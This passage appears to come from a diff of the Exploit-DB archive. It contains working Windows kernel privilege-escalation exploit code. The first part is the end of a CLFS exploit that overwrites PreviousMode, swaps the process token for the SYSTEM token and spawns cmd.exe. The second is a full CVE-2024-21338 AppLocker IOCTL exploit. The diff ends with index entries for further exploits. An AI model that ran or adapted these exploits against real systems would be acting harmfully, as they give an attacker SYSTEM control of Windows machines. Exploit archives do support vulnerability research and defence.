PSACTIVEPROCESSHEAD_OFFSET), &eprocess, sizeof(eprocess), NULL);
// eprocess = eprocess - ACTIVEPROCESSLINKS_OFFSET;
//
// NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET),
&systemtoken, sizeof(systemtoken), NULL);
//
//
// while (1) {
// NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess +
ACTIVEPROCESSLINKS_OFFSET), &eprocess, sizeof(eprocess), NULL);
//
// eprocess -= ACTIVEPROCESSLINKS_OFFSET;
//
// NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess +
UNIQUEPROCESSID_OFFSET), &pid, sizeof(pid), NULL);
// std::cout << "pid = " << pid << std::endl;
//
// if (pid == GetCurrentProcessId())
// break;
// }
//
// NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET),
&currenttoken, sizeof(currenttoken), NULL);
//
//
//
// //clears refcnt
// currenttoken = currenttoken & 0xfffffffffffffff0;
//
// printf("performing NtWriteVirtualMemory..\n");
//
// getchar();
//
// //NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(currenttoken +
TOKENPRIVILEGESPRESENT_OFFSET), &privileges, 0x8, NULL);
// //NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(currenttoken +
TOKENPRIVILEGSENABLED_OFFSET), &privileges, 0x8, NULL);
//
//
// NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET),
&systemtoken, 0x8, NULL);
//
// return TRUE;
//}
int main()
{
HMODULE hModule;
HRSRC hResource;
errno_t err;
HGLOBAL hLoadedResource;
LPVOID pResourceData;
DWORD resourceSize;
FILE* file;
DWORD sectorsPerCluster;
DWORD bytesPerSector;
DWORD numberOfFreeClusters;
DWORD totalNumberOfClusters;
const char* rootPath = "C:\\";
PVOID marshallingArea = NULL;
ULONGLONG pcbContainer = 0;
std::wstring logFileName = L"LOG:";
std::wstring inputName = L"C:\\temp\\testlog\\mylogdddd.blf";
logFileName += inputName;
DWORD64 buf = 0;
ULONG bytesRead = 0;
LPVOID PreviousModeAddr = NULL;
DWORD threadId = GetCurrentThreadId(); // Get the current thread ID
DWORD64 eprocess = 0;
DWORD64 systemtoken = 0;
DWORD64 currenttoken = 0;
DWORD64 pid = 0;
BYTE PreviousMode = 0x1;
DWORD64 privileges = 0x0000001ff2ffffbc;
const char* directoryName1 = "C:\\temp";
const char* directoryName2 = "C:\\temp\\testlog";
HANDLE logHndl = INVALID_HANDLE_VALUE;
ULONGLONG cbContainer = (ULONGLONG)0x80000;
//Creating directories with the baselog and container file
if (CreateDirectoryA(directoryName1, NULL)) {
printf("Directory created successfully: %s\n", directoryName1);
}
else {
DWORD error = GetLastError();
if (error == ERROR_ALREADY_EXISTS) {
printf("The directory already exists: %s\n", directoryName1);
}
else {
printf("Failed to create the directory. Error code: %lu\n",
error);
return 0;
}
}
if (CreateDirectoryA(directoryName2, NULL)) {
printf("Directory created successfully: %s\n", directoryName2);
}
else {
DWORD error = GetLastError();
if (error == ERROR_ALREADY_EXISTS) {
printf("The directory already exists: %s\n", directoryName2);
}
else {
printf("Failed to create the directory. Error code: %lu\n",
error);
return 0;
}
}
//creating BLF
logHndl = CreateLogFile(logFileName.c_str(),
GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_ALWAYS,
0);
if (logHndl == INVALID_HANDLE_VALUE) {
printf("CreateLogFile failed with error %d\n", GetLastError());
return 0;
}
else {
printf("file opened successfully\n");
}
//creating and adding container to BLF
if (!AddLogContainer(logHndl, &cbContainer,
(LPWSTR)L"C:\\temp\\testlog\\container1", NULL)) {
printf("AddLogContainer failed with error %d\n", GetLastError());
}
else {
printf("AddLogContainer successful\n");
}
//closing BLF
CloseHandle(logHndl);
// Initialize variables
hModule = GetModuleHandle(NULL);
if (!hModule) {
printf("Failed to get module handle.\n");
return 1;
}
// Find the resource in the executable
hResource = FindResource(hModule, MAKEINTRESOURCE(IDR_RCDATA1),
RT_RCDATA);
if (!hResource) {
printf("Failed to find resource. Error: %lu\n", GetLastError());
return 1;
}
printf("hResource = 0x%p\n", hResource);
// Load the resource into memory
hLoadedResource = LoadResource(hModule, hResource);
if (!hLoadedResource) {
printf("Failed to load resource. Error: %lu\n", GetLastError());
return 1;
}
printf("hResource = 0x%p\n", hLoadedResource);
// Lock the resource to get a pointer to its data
pResourceData = LockResource(hLoadedResource);
if (!pResourceData) {
printf("Failed to lock resource. Error: %lu\n", GetLastError());
return 1;
}
printf("pResourceData = 0x%p\n", pResourceData);
// Get the size of the resource
resourceSize = SizeofResource(hModule, hResource);
if (resourceSize == 0) {
printf("Failed to get resource size. Error: %lu\n", GetLastError());
return 1;
}
// At this point, pResourceData points to the binary data, and
resourceSize contains its size
printf("Resource size: %lu bytes\n", resourceSize);
// Example: Write the resource data to a file
err = fopen_s(&file, "C:\\temp\\testlog\\mylogdddd.blf.blf", "wb");
if (err == 0 && file) {
fwrite(pResourceData, 1, resourceSize, file);
fclose(file);
printf("Resource written to output.bin successfully.\n");
}
else {
printf("Failed to open output file. Error code: %d\n", err);
}
//preparing data structures in memory
g_ntbase = GetKernelBaseAddress();
NtReadVirtualMemory =
(fNtReadVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll"),
"NtReadVirtualMemory");
NtWriteVirtualMemory =
(fNtWriteVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll"),
"NtWriteVirtualMemory");
if (!NtReadVirtualMemory || !NtWriteVirtualMemory) {
printf("Failed to get addresses for NtReadVirtualMemory or
NtWriteVirtualMemory\n");
return -1;
}
printf("NtReadVirtualMemory = 0x%p\n", (DWORD64)NtReadVirtualMemory);
printf("NtWriteVirtualMemory = 0x%p\n", (DWORD64)NtWriteVirtualMemory);
// Open a real handle to the current thread
HANDLE threadHandle = OpenThread(THREAD_ALL_ACCESS, FALSE, threadId);
if (threadHandle == NULL) {
printf("Failed to get real handle to the current thread. Error:
%lu\n", GetLastError());
return 1;
}
//0x232 = offset to _KTHREAD.PreviousMode
address_to_write = (LPVOID)((DWORD64)(GetKAddrFromHandle(threadHandle))
+ 0x232);
auto pcclfscontainer = VirtualAlloc((LPVOID)0x2100000, 0x1000,
MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
memset(pcclfscontainer, 0, 0x1000);
auto vtable = (DWORD64)pcclfscontainer + 0x100;
auto rcx = pcclfscontainer;
*(PDWORD64)((PCHAR)rcx + 0x40) = (DWORD64)pcclfscontainer + 0x200;
*(PDWORD64)((PCHAR)pcclfscontainer + 0x200 + 0x68) = (DWORD64)g_ntbase
+ DBGKPTRIAGEDUMPRESTORESTATE_OFFSET;
//arg1 of DBGKPTRIAGEDUMPRESTORESTATE
*(PDWORD64)((PCHAR)rcx + 0x48) = (DWORD64)pcclfscontainer + 0x300;
auto arg_DBGKPTRIAGEDUMPRESTORESTATE = (DWORD64)pcclfscontainer + 0x300;
//address of arbitrary write of DBGKPTRIAGEDUMPRESTORESTATE. remember
It writes at offset 0x2078 of where
*((PDWORD64)(arg_DBGKPTRIAGEDUMPRESTORESTATE)) =
(DWORD64)address_to_write - 0x2078;
//value of arbitrary write of DBGKPTRIAGEDUMPRESTORESTATE
*((PDWORD64)((PCHAR)arg_DBGKPTRIAGEDUMPRESTORESTATE + 0x10)) =
0x0014000000000f00;
((PDWORD64)vtable)[1] = (DWORD64)g_ntbase +
POFXPROCESSORNOTIFICATION_OFFSET;
*(PDWORD64)pcclfscontainer = (DWORD64)vtable;
printf("pcclfscontainer = 0x%p\n", (DWORD64)pcclfscontainer);
printf("address_to_write = 0x%p\n", (DWORD64)address_to_write);
HANDLE processHandle = GetCurrentProcess(); // Get the current process
handle
// Set the process priority to HIGH_PRIORITY_CLASS
if (SetPriorityClass(processHandle, REALTIME_PRIORITY_CLASS)) {
printf("Process priority set to REALTIME_PRIORITY_CLASS.\n");
}
else {
DWORD error = GetLastError();
printf("Failed to set process priority. Error code: %lu\n", error);
return 1;
}
threadHandle = GetCurrentThread();
if (SetThreadPriority(threadHandle, THREAD_PRIORITY_TIME_CRITICAL)) {
printf("Thread priority set to the highest level:
TIME_CRITICAL.\n");
}
else {
DWORD error = GetLastError();
printf("Failed to set thread priority. Error code: %lu\n", error);
return 1;
}
printf("triggering vuln...");
logHndl = CreateLogFile(logFileName.c_str(),
GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_ALWAYS,
0);
if (logHndl == INVALID_HANDLE_VALUE) {
printf("CreateLogFile failed with error %d\n", GetLastError());
}
else {
printf("file opened successfully\n");
}
// Set the process priority to HIGH_PRIORITY_CLASS
if (SetPriorityClass(processHandle, NORMAL_PRIORITY_CLASS)) {
printf("Process priority set to NORMAL_PRIORITY_CLASS.\n");
}
else {
DWORD error = GetLastError();
printf("Failed to set process priority. Error code: %lu\n", error);
return 1;
}
if (SetThreadPriority(threadHandle, THREAD_PRIORITY_NORMAL)) {
printf("Thread priority set to the highest level:
THREAD_PRIORITY_NORMAL.\n");
}
else {
DWORD error = GetLastError();
printf("Failed to set thread priority. Error code: %lu\n", error);
return 1;
}
printf("vuln triggered\n");
printf("reading base of ntoskrnl to check we have arbitrary
read/write\n");
NtReadVirtualMemory((HANDLE)-1, g_ntbase, &buf, sizeof(buf), NULL);
printf("buf = 0x%p\n", (DWORD64)buf);
printf("swapping tokens...\n");
NtReadVirtualMemory((HANDLE)-1, (LPVOID)((DWORD64)g_ntbase +
PSACTIVEPROCESSHEAD_OFFSET), &eprocess, sizeof(eprocess), NULL);
eprocess = eprocess - ACTIVEPROCESSLINKS_OFFSET;
NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET),
&systemtoken, sizeof(systemtoken), NULL);
while (1) {
NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess +
ACTIVEPROCESSLINKS_OFFSET), &eprocess, sizeof(eprocess), NULL);
eprocess -= ACTIVEPROCESSLINKS_OFFSET;
NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess +
UNIQUEPROCESSID_OFFSET), &pid, sizeof(pid), NULL);
if (pid == (DWORD64)GetCurrentProcessId())
break;
}
printf("current token address = 0x%p\n", eprocess + TOKEN_OFFSET);
printf("systemtoken = 0x%p\n", systemtoken);
printf("Overwriting process token..\n");
NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET),
&systemtoken, sizeof(systemtoken), NULL);
printf("token swapped. Restoring PreviousMode and spawning system
shell...\n");
PreviousModeAddr = address_to_write;
PreviousMode = 0x1;
NtWriteVirtualMemory((HANDLE)-1, PreviousModeAddr, &PreviousMode,
sizeof(PreviousMode), NULL);
system("cmd.exe");
return 0;
}

393
exploits/windows/local/52275.c Normal file
View file

@ -0,0 +1,393 @@
# Exploit Title: Microsoft Windows 11 - Kernel Privilege Escalation
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2024-21338
#include "pch.hpp"
#include "poc.hpp"
// This function is used to set the IOCTL buffer depending on the Windows
version
void* c_poc::set_ioctl_buffer(size_t* k_thread_offset, OSVERSIONINFOEXW*
os_info)
{
os_info->dwOSVersionInfoSize = sizeof(*os_info);
// Get the OS version
NTSTATUS status = RtlGetVersion(os_info);
if (!NT_SUCCESS(status)) {
log_err("Failed to get OS version!");
return nullptr;
}
log_debug("Windows version detected: %lu.%lu, build: %lu.",
os_info->dwMajorVersion, os_info->dwMinorVersion, os_info->dwBuildNumber);
// "PreviousMode" offset in ETHREAD structure
*k_thread_offset = 0x232;
// Set the "AipSmartHashImageFile" function buffer depending on the
Windows version
void* ioctl_buffer_alloc = os_info->dwBuildNumber < 22000
? malloc(sizeof(AIP_SMART_HASH_IMAGE_FILE_W10))
: malloc(sizeof(AIP_SMART_HASH_IMAGE_FILE_W11));
return ioctl_buffer_alloc;
}
// This function is used to get the ETHREAD address through the
SystemHandleInformation method that is used to get the address of the
current thread object based on the pseudo handle -2
UINT_PTR c_poc::get_ethread_address()
{
// Duplicate the pseudo handle -2 to get the current thread object
HANDLE h_current_thread_pseudo = reinterpret_cast<HANDLE>(-2);
HANDLE h_duplicated_handle = {};
if (!DuplicateHandle(
reinterpret_cast<HANDLE>(-1),
h_current_thread_pseudo,
reinterpret_cast<HANDLE>(-1),
&h_duplicated_handle,
NULL,
FALSE,
DUPLICATE_SAME_ACCESS))
{
log_err("Failed to duplicate handle, error: %lu", GetLastError());
return EXIT_FAILURE;
}
NTSTATUS status = {};
ULONG ul_bytes = {};
PSYSTEM_HANDLE_INFORMATION h_table_info = {};
// Get the current thread object address
while ((status = NtQuerySystemInformation(SystemHandleInformation,
h_table_info, ul_bytes, &ul_bytes)) == STATUS_INFO_LENGTH_MISMATCH)
{
if (h_table_info != NULL)
h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, h_table_info, (2 * (SIZE_T)ul_bytes));
else
h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, (2 * (SIZE_T)ul_bytes));
}
UINT_PTR ptr_token_address = 0;
if (NT_SUCCESS(status)) {
for (ULONG i = 0; i < h_table_info->NumberOfHandles; i++) {
if (h_table_info->Handles[i].UniqueProcessId == GetCurrentProcessId() &&
h_table_info->Handles[i].HandleValue ==
reinterpret_cast<USHORT>(h_duplicated_handle)) {
ptr_token_address =
reinterpret_cast<UINT_PTR>(h_table_info->Handles[i].Object);
break;
}
}
}
else {
if (h_table_info) {
log_err("NtQuerySystemInformation failed, (code: 0x%X)", status);
NtClose(h_duplicated_handle);
}
}
return ptr_token_address;
}
// This function is used to get the FileObject address through the
SystemHandleInformation method that is used to get the address of the file
object.
UINT_PTR c_poc::get_file_object_address()
{
// Create a dummy file to get the file object address
HANDLE h_file = CreateFileW(L"C:\\Users\\Public\\example.txt",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr,
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr);
if (h_file == INVALID_HANDLE_VALUE) {
log_err("Failed to open dummy file, error: %lu", GetLastError());
return EXIT_FAILURE;
}
// Get the file object address
NTSTATUS status = {};
ULONG ul_bytes = 0;
PSYSTEM_HANDLE_INFORMATION h_table_info = NULL;
while ((status = NtQuerySystemInformation(
SystemHandleInformation, h_table_info, ul_bytes,
&ul_bytes)) == STATUS_INFO_LENGTH_MISMATCH) {
if (h_table_info != NULL)
h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, h_table_info, 2 * (SIZE_T)ul_bytes);
else
h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, 2 * (SIZE_T)ul_bytes);
}
UINT_PTR token_address = 0;
if (NT_SUCCESS(status)) {
for (ULONG i = 0; i < h_table_info->NumberOfHandles; i++) {
if (h_table_info->Handles[i].UniqueProcessId == GetCurrentProcessId() &&
h_table_info->Handles[i].HandleValue ==
reinterpret_cast<USHORT>(h_file)) {
token_address =
reinterpret_cast<UINT_PTR>(h_table_info->Handles[i].Object);
break;
}
}
}
return token_address;
}
// This function is used to get the kernel module address based on the
module name
UINT_PTR c_poc::get_kernel_module_address(const char* target_module)
{
// Get the kernel module address based on the module name
NTSTATUS status = {};
ULONG ul_bytes = {};
PSYSTEM_MODULE_INFORMATION h_table_info = {};
while ((status = NtQuerySystemInformation(
SystemModuleInformation, h_table_info, ul_bytes,
&ul_bytes)) == STATUS_INFO_LENGTH_MISMATCH) {
if (h_table_info != NULL)
h_table_info = (PSYSTEM_MODULE_INFORMATION)HeapReAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, h_table_info, 2 * (SIZE_T)ul_bytes);
else
h_table_info = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, 2 * (SIZE_T)ul_bytes);
}
if (NT_SUCCESS(status)) {
for (ULONG i = 0; i < h_table_info->ModulesCount; i++) {
if (strstr(h_table_info->Modules[i].Name, target_module) != nullptr) {
return reinterpret_cast<UINT_PTR>(
h_table_info->Modules[i].ImageBaseAddress);
}
}
}
return 0;
}
// This function is used to scan the section for the pattern.
BOOL c_poc::scan_section_for_pattern(HANDLE h_process, LPVOID
lp_base_address, SIZE_T dw_size, BYTE* pattern, SIZE_T pattern_size,
LPVOID* lp_found_address) {
std::unique_ptr<BYTE[]> buffer(new BYTE[dw_size]);
SIZE_T bytes_read = {};
if (!ReadProcessMemory(h_process, lp_base_address, buffer.get(), dw_size,
&bytes_read)) {
return false;
}
for (SIZE_T i = 0; i < dw_size - pattern_size; i++) {
if (memcmp(pattern, &buffer[i], pattern_size) == 0) {
*lp_found_address = reinterpret_cast<LPVOID>(
reinterpret_cast<DWORD_PTR>(lp_base_address) + i);
return true;
}
}
return false;
}
// This function is used to find the pattern in the module, in this case
the pattern is the nt!ExpProfileDelete function
UINT_PTR c_poc::find_pattern(HMODULE h_module)
{
UINT_PTR relative_offset = {};
auto* p_dos_header = reinterpret_cast<PIMAGE_DOS_HEADER>(h_module);
auto* p_nt_headers = reinterpret_cast<PIMAGE_NT_HEADERS>(
reinterpret_cast<LPBYTE>(h_module) + p_dos_header->e_lfanew);
auto* p_section_header = IMAGE_FIRST_SECTION(p_nt_headers);
LPVOID lp_found_address = nullptr;
for (WORD i = 0; i < p_nt_headers->FileHeader.NumberOfSections; i++) {
if (strcmp(reinterpret_cast<CHAR*>(p_section_header[i].Name), "PAGE") ==
0) {
LPVOID lp_section_base_address =
reinterpret_cast<LPVOID>(reinterpret_cast<LPBYTE>(h_module) +
p_section_header[i].VirtualAddress);
SIZE_T dw_section_size = p_section_header[i].Misc.VirtualSize;
// Pattern to nt!ExpProfileDelete
BYTE pattern[] = { 0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x83,
0x79, 0x30, 0x00, 0x48, 0x8B, 0xD9, 0x74 };
SIZE_T pattern_size = sizeof(pattern);
if (this->scan_section_for_pattern(
GetCurrentProcess(), lp_section_base_address, dw_section_size,
pattern, pattern_size, &lp_found_address)) {
relative_offset = reinterpret_cast<UINT_PTR>(lp_found_address) -
reinterpret_cast<UINT_PTR>(h_module);
}
break;
}
}
return relative_offset;
}
// This function is used to send the IOCTL request to the driver, in this
case the AppLocker driver through the AipSmartHashImageFile IOCTL
bool c_poc::send_ioctl_request(HANDLE h_device, PVOID input_buffer, size_t
input_buffer_length)
{
IO_STATUS_BLOCK io_status = {};
NTSTATUS status =
NtDeviceIoControlFile(h_device, nullptr, nullptr, nullptr, &io_status,
this->IOCTL_AipSmartHashImageFile, input_buffer,
input_buffer_length, nullptr, 0);
return NT_SUCCESS(status);
}
// This function executes the exploit
bool c_poc::act() {
// Get the OS version, set the IOCTL buffer and open a handle to the
AppLocker driver
OSVERSIONINFOEXW os_info = {};
size_t offset_of_previous_mode = {};
auto ioctl_buffer = this->set_ioctl_buffer(&offset_of_previous_mode,
&os_info);
if (!ioctl_buffer) {
log_err("Failed to allocate the correct buffer to send on the IOCTL
request.");
return false;
}
// Open a handle to the AppLocker driver
OBJECT_ATTRIBUTES object_attributes = {};
UNICODE_STRING appid_device_name = {};
RtlInitUnicodeString(&appid_device_name, L"\\Device\\AppID");
InitializeObjectAttributes(&object_attributes, &appid_device_name,
OBJ_CASE_INSENSITIVE, NULL, NULL, NULL);
IO_STATUS_BLOCK io_status = {};
HANDLE h_device = {};
NTSTATUS status = NtCreateFile(&h_device, GENERIC_READ | GENERIC_WRITE,
&object_attributes, &io_status, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, 0, NULL, 0);
if (!NT_SUCCESS(status))
{
log_debug("Failed to open a handle to the AppLocker driver (%ls) (code:
0x%X)", appid_device_name.Buffer, status);
return false;
}
log_debug("AppLocker (AppId) handle opened: 0x%p", h_device);
log_debug("Leaking the current ETHREAD address.");
// Get the ETHREAD address, FileObject address, KernelBase address and the
relative offset of the nt!ExpProfileDelete function
auto e_thread_address = this->get_ethread_address();
auto file_obj_address = this->get_file_object_address();
auto ntoskrnl_kernel_base_address =
this->get_kernel_module_address("ntoskrnl.exe");
auto ntoskrnl_user_base_address =
LoadLibraryExW(L"C:\\Windows\\System32\\ntoskrnl.exe", NULL, NULL);
if (!e_thread_address && !ntoskrnl_kernel_base_address &&
!ntoskrnl_user_base_address && !file_obj_address)
{
log_debug("Failed to fetch the ETHREAD/FileObject/KernelBase addresses.");
return false;
}
log_debug("ETHREAD address leaked: 0x%p", e_thread_address);
log_debug("Feching the ExpProfileDelete (user cfg gadget) address.");
auto relative_offset = this->find_pattern(ntoskrnl_user_base_address);
UINT_PTR kcfg_gadget_address = (ntoskrnl_kernel_base_address +
relative_offset);
ULONG_PTR previous_mode = (e_thread_address + offset_of_previous_mode);
log_debug("Current ETHREAD PreviousMode address -> 0x%p", previous_mode);
log_debug("File object address -> 0x%p", file_obj_address);
log_debug("kCFG Kernel Base address -> 0x%p",
ntoskrnl_kernel_base_address);
log_debug("kCFG User Base address -> 0x%p", ntoskrnl_user_base_address);
log_debug("kCFG Gadget address -> 0x%p", kcfg_gadget_address);
// Set the IOCTL buffer depending on the Windows version
size_t ioctl_buffer_length = {};
CFG_FUNCTION_WRAPPER kcfg_function = {};
if (os_info.dwBuildNumber < 22000) {
AIP_SMART_HASH_IMAGE_FILE_W10* w10_ioctl_buffer =
(AIP_SMART_HASH_IMAGE_FILE_W10*)ioctl_buffer;
kcfg_function.FunctionPointer = (PVOID)kcfg_gadget_address;
// Add 0x30 because of lock xadd qword ptr [rsi-30h], rbx in
ObfDereferenceObjectWithTag
UINT_PTR previous_mode_obf = previous_mode + 0x30;
w10_ioctl_buffer->FirstArg = previous_mode_obf; // +0x00
w10_ioctl_buffer->Value = (PVOID)file_obj_address; // +0x08
w10_ioctl_buffer->PtrToFunctionWrapper = &kcfg_function; // +0x10
ioctl_buffer_length = sizeof(AIP_SMART_HASH_IMAGE_FILE_W10);
}
else
{
AIP_SMART_HASH_IMAGE_FILE_W11* w11_ioctl_buffer =
(AIP_SMART_HASH_IMAGE_FILE_W11*)ioctl_buffer;
kcfg_function.FunctionPointer = (PVOID)kcfg_gadget_address;
// Add 0x30 because of lock xadd qword ptr [rsi-30h], rbx in
ObfDereferenceObjectWithTag
UINT_PTR previous_mode_obf = previous_mode + 0x30;
w11_ioctl_buffer->FirstArg = previous_mode_obf; // +0x00
w11_ioctl_buffer->Value = (PVOID)file_obj_address; // +0x08
w11_ioctl_buffer->PtrToFunctionWrapper = &kcfg_function; // +0x10
w11_ioctl_buffer->Unknown = NULL; // +0x18
ioctl_buffer_length = sizeof(AIP_SMART_HASH_IMAGE_FILE_W11);
}
// Send the IOCTL request to the driver
log_debug("Sending IOCTL request to 0x22A018 (AipSmartHashImageFile)");
char* buffer = (char*)malloc(sizeof(CHAR));
if (ioctl_buffer)
{
log_debug("ioctl_buffer -> 0x%p size: %d", ioctl_buffer,
ioctl_buffer_length);
if (!this->send_ioctl_request(h_device, ioctl_buffer,
ioctl_buffer_length))
return false;
NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)buffer,
(PVOID)previous_mode, sizeof(CHAR), nullptr);
log_debug("Current PreviousMode -> %d", *buffer);
// From now on all Read/Write operations will be done in Kernel Mode.
}
log_debug("Restoring...");
// Restores PreviousMode to 1 (user-mode).
*buffer = 1;
NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)previous_mode,
(PVOID)buffer, sizeof(CHAR), nullptr);
log_debug("Current PreviousMode -> %d", *buffer);
// Free the allocated memory and close the handle to the AppLocker driver
free(ioctl_buffer);
free(buffer);
NtClose(h_device);
return true;
}

8
files_exploits.csv
View file

@ -7829,6 +7829,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,,2019-04-19,2019-04-19,1,CVE-2010-4170,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb
46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,,2019-04-19,2019-04-19,1,CVE-2010-4170,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb
23892,exploits/linux/local/23892.c,"Systrace 1.x - Local Policy Bypass",2004-03-29,Brad,local,linux,,2004-03-29,2013-01-05,1,,,,,,https://www.securityfocus.com/bid/9998/info
52268,exploits/linux/local/52268.py,"tar-fs 3.0.0 - Arbitrary File Write/Overwrite",2025-04-22,cybersploit,local,linux,,2025-04-22,2025-04-22,0,CVE-2024-12905,,,,,
23350,exploits/linux/local/23350.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (1)",2003-11-07,c0wboy,local,linux,,2003-11-07,2012-12-13,1,,,,,,http://www.0x333.org/advisories/outsiders-terminatorX-001.txt
23351,exploits/linux/local/23351.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (2)",2003-11-07,Bobby,local,linux,,2003-11-07,2012-12-13,1,,,,,,https://www.securityfocus.com/bid/8993/info
23352,exploits/linux/local/23352.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)",2003-11-07,"m00 security",local,linux,,2003-11-07,2012-12-13,1,,,,,,https://www.securityfocus.com/bid/8993/info
@ -8564,6 +8565,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,,2018-07-10,2018-07-10,0,,,,,,https://github.com/SECFORCE/sftp-exploit/blob/9ffed4de6da26a6ee70e105235d7a5c596269a43/sftp-exploit.py
40963,exploits/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",remote,linux,22,2016-12-23,2016-12-23,1,CVE-2016-10009,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1009
45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22,2018-12-04,2018-12-04,0,CVE-2018-15473,,,,,
52269,exploits/linux/remote/52269.c,"OpenSSH server (sshd) 9.8p1 - Race Condition",2025-04-22,"Milad karimi",remote,linux,,2025-04-22,2025-04-22,0,CVE-2024-6387,,,,,
26,exploits/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident",2003-05-02,"Nicolas Couture",remote,linux,,2003-05-01,2016-10-27,1,OSVDB-2140;CVE-2003-0190,,,,http://www.exploit-db.comopenssh-3.6.1p1.tar.gz,
25,exploits/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",remote,linux,,2003-04-29,2016-02-10,1,OSVDB-2140;CVE-2003-0190,,,,http://www.exploit-db.comopenssh-3.6.1p1.tar.gz,http://lab.mediaservice.net/advisory/2003-01-openssh.txt
40113,exploits/linux/remote/40113.txt,"OpenSSHd 7.2p2 - Username Enumeration",2016-07-18,"Eddie Harari",remote,linux,22,2016-07-18,2016-12-07,0,CVE-2016-6210,,,,http://www.exploit-db.comopenssh-7.2p2.tar.gz,http://seclists.org/fulldisclosure/2016/Jul/51
@ -10914,6 +10916,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30944,exploits/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow / Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",remote,multiple,,2007-12-27,2014-01-20,1,CVE-2007-6630;OSVDB-40158,,,,,https://www.securityfocus.com/bid/27049/info
31050,exploits/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",remote,multiple,,2008-01-28,2014-01-20,1,CVE-2008-0387;OSVDB-43187,,,,,https://www.securityfocus.com/bid/27403/info
29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",remote,multiple,,2007-03-06,2013-11-26,1,CVE-2007-1947;OSVDB-34122,,,,,https://www.securityfocus.com/bid/23349/info
52273,exploits/multiple/remote/52273.py,"Firefox ESR 115.11 - PDF.js Arbitrary JavaScript execution",2025-04-22,"Milad karimi",remote,multiple,,2025-04-22,2025-04-22,0,CVE-2024-4367,,,,,
37851,exploits/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",remote,multiple,,2015-08-19,2015-08-19,1,CVE-2015-5116,,,,,https://code.google.com/p/google-security-research/issues/detail?id=354&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
